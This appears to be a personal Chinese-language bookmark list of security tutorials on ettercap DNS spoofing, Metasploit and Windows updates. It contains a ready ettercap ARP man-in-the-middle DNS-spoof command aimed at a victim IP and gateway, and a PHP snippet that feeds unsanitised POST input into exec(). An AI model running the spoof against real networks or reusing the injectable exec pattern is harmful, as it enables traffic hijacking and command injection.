http://blog.sina.com.cn/s/blog_4c86552f0102wkbc.html

https://www.bilibili.com/video/av68562526/?p=4

https://www.cnblogs.com/whych/p/9147900.html

ettercap局域网内DNS欺骗
https://blog.csdn.net/aozhuo4755/article/details/101107875
https://www.freebuf.com/articles/system/5265.html

命令行：
https://blog.csdn.net/qq_38228830/article/details/81989301

ettercap -Tq -i 网卡 -M arp:remote -P 插件名称 /要欺骗的ip// /网关ip//
ettercap -Tq -i eth0 -M arp:remote -P dns_spoof /20.2.1.102// /20.2.1.254//

-P 使用插件，这里我们使用的是dns_spoof
-T 使用基于文本界面
-q 启动安静模式（不回显的意思）
-M 启动中间人攻击ARP欺骗攻击

DNS解析过程图解

http://www.srxh1314.com/online-resroure.html

请输入代码

<?php

$url=$_POST["url"];
 if(empty($url)) die(0);
$shell = "wget -P /down/ " .$url;
echo "<pre>";
exec($shell, $result, $status);
echo "</pre>";
//注意shell命令的执行结果和执行返回的状态值的对应关系
$shell = "<font color='red'>$shell</font>";
if( $status ){
    echo "failur";
} else {
    echo "success";
}

?>

https://www.cloudping.info/

通过组策略修改自动更新
https://www.mf8.biz/windows-server-2019-2016-update/

更新服务器：
http://windowsupdate.aliyun-inc.com
http://wsus.neu.edu.cn

漏洞攻击实践
https://www.cnblogs.com/20179204gege/p/7747655.html

Metasploit-auxiliary的常用模块使用(端口扫描，永恒之蓝攻击)
http://www.liuwx.cn/metasploit-3.html

metasploit常用命令
https://www.cnblogs.com/hijacklinux/p/7072854.html

Metasploit Framework（1）基本命令、简单使用
https://www.cnblogs.com/xuyiqing/p/9879061.html

Metasploit Framework（2）Exploit模块、Payload使用
https://www.cnblogs.com/xuyiqing/p/9888512.html

Metasploit Framework（4）信息收集
https://www.cnblogs.com/xuyiqing/p/9896326.html

Metasploit Framework（5）弱点扫描
https://www.cnblogs.com/xuyiqing/p/9900882.html

Metasploit Framework（6）客户端渗透（上）
https://www.cnblogs.com/xuyiqing/p/9903672.html

Metasploit Framework（7）客户端渗透（下）
https://www.cnblogs.com/xuyiqing/p/9908942.html

Metasploit Framework（8）后渗透测试（一）
https://www.cnblogs.com/xuyiqing/p/9914538.html

METASPLOIT基础入门
https://blog.csdn.net/jiangliuzheng/article/details/50546783

http://www.vuln.cn/2444